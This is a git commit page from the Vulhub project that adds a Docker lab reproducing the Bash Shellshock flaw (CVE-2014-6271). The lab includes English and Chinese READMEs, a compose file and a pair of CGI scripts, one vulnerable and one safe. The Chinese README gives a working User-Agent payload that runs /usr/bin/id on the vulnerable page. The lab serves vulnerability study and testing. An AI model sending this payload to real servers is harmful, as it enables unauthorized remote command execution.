first commit
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Vulhub Docker Image CI / images-test (push) Has been cancelled
This commit is contained in:
BIN
bash/CVE-2014-6271/1.png
Normal file
BIN
bash/CVE-2014-6271/1.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 22 KiB |
BIN
bash/CVE-2014-6271/2.png
Normal file
BIN
bash/CVE-2014-6271/2.png
Normal file
Binary file not shown.
|
After Width: | Height: | Size: 33 KiB |
25
bash/CVE-2014-6271/README.md
Normal file
25
bash/CVE-2014-6271/README.md
Normal file
@@ -0,0 +1,25 @@
|
||||
# Bash Shellshock Remote Command Injection (CVE-2014-6271)
|
||||
|
||||
[中文版本(Chinese version)](README.zh-cn.md)
|
||||
|
||||
Build and run the vulnerable environment:
|
||||
|
||||
```
|
||||
docker compose build
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
When you visit `http://your-ip/` you should see two files:
|
||||
|
||||
- safe.cgi
|
||||
- victim.cgi
|
||||
|
||||
safe.cgi generated by the latest version of bash, and victim.cgi is the page generated by bash4.3 which is vulnerable to shellshock.
|
||||
|
||||
We can send include our payload in the user-agent string when visiting victim.cgi and the command is executed successfully:
|
||||
|
||||
|
||||
|
||||
The same request sent to safe.cgi is unaffected:
|
||||
|
||||
|
||||
23
bash/CVE-2014-6271/README.zh-cn.md
Normal file
23
bash/CVE-2014-6271/README.zh-cn.md
Normal file
@@ -0,0 +1,23 @@
|
||||
# Bash Shellshock 远程命令注入漏洞(CVE-2014-6271)
|
||||
|
||||
编译运行:
|
||||
|
||||
```
|
||||
docker compose up -d
|
||||
```
|
||||
|
||||
服务启动后,有两个页面`http://your-ip:8080/victim.cgi`和`http://your-ip:8080/safe.cgi`。其中safe.cgi是最新版bash生成的页面,victim.cgi是bash4.3生成的页面。
|
||||
|
||||
将payload附在User-Agent中访问victim.cgi:
|
||||
|
||||
```
|
||||
User-Agent: () { foo; }; echo Content-Type: text/plain; echo; /usr/bin/id
|
||||
```
|
||||
|
||||
命令成功被执行:
|
||||
|
||||
|
||||
|
||||
同样的数据包访问safe.cgi,不受影响:
|
||||
|
||||
|
||||
9
bash/CVE-2014-6271/docker-compose.yml
Normal file
9
bash/CVE-2014-6271/docker-compose.yml
Normal file
@@ -0,0 +1,9 @@
|
||||
version: '2'
|
||||
services:
|
||||
web:
|
||||
image: vulhub/bash:4.3.0-with-httpd
|
||||
ports:
|
||||
- "8080:80"
|
||||
volumes:
|
||||
- ./safe.cgi:/var/www/html/safe.cgi
|
||||
- ./victim.cgi:/var/www/html/victim.cgi
|
||||
15
bash/CVE-2014-6271/safe.cgi
Normal file
15
bash/CVE-2014-6271/safe.cgi
Normal file
@@ -0,0 +1,15 @@
|
||||
#!/bin/bash
|
||||
echo "Content-type: text/html"
|
||||
echo ""
|
||||
echo '<html>'
|
||||
echo '<head>'
|
||||
echo '<meta http-equiv="Content-Type" content="text/html; charset=utf-8">'
|
||||
echo '<title>Bash ShellShock</title>'
|
||||
echo '</head>'
|
||||
echo '<body>'
|
||||
echo '<p>'
|
||||
echo 'Hello world'
|
||||
echo '</p>'
|
||||
echo '</body>'
|
||||
echo '</html>'
|
||||
exit 0
|
||||
15
bash/CVE-2014-6271/victim.cgi
Normal file
15
bash/CVE-2014-6271/victim.cgi
Normal file
@@ -0,0 +1,15 @@
|
||||
#!/usr/local/bash-4.3.0/bin/bash
|
||||
echo "Content-type: text/html"
|
||||
echo ""
|
||||
echo '<html>'
|
||||
echo '<head>'
|
||||
echo '<meta http-equiv="Content-Type" content="text/html; charset=utf-8">'
|
||||
echo '<title>Bash ShellShock</title>'
|
||||
echo '</head>'
|
||||
echo '<body>'
|
||||
echo '<p>'
|
||||
echo 'Hello world'
|
||||
echo '</p>'
|
||||
echo '</body>'
|
||||
echo '</html>'
|
||||
exit 0
|
||||
Reference in New Issue
Block a user